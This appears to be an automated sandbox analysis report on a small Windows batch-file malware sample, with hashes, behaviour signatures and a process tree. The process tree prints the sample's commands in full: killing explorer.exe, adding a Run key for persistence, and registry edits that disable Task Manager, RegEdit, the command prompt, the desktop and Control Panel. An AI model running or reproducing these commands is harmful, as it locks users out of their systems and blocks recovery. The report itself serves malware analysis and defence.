Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-07-2024 09:10

General

  • Target

    вин.bat

  • Size

    1KB

  • MD5

    c680bec28423eb77397704aab875640c

  • SHA1

    9ff1f6c4537e9d05a58220cb47793e71d4536959

  • SHA256

    3cc90a8d47b3ef8c3325e58c9f677c22d0a6a946c73012b5a02251fdaa297dd0

  • SHA512

    db5b8219f903a95d70276ed3de1eebd9ea1f438fb25600470f0c04436e13ad30ff64148ea871bbe95fad79ba803338d7a8337155c980fe6c36dbe710cd39ede4

Score
8/10

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\вин.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\Windows\system32\msg.exe
      msg by File0
      2⤵
        PID:2948
      • C:\Windows\system32\taskkill.exe
        taskkill /im explorer.exe /f
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
        2⤵
        • Modifies registry key
        PID:3220
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
        2⤵
        • Adds Run key to start application
        PID:2684
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2880
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        2⤵
        • Disables RegEdit via registry modification
        • Modifies registry key
        PID:4864
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
        2⤵
        • Modifies registry key
        PID:4640
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:4984
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:3412

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads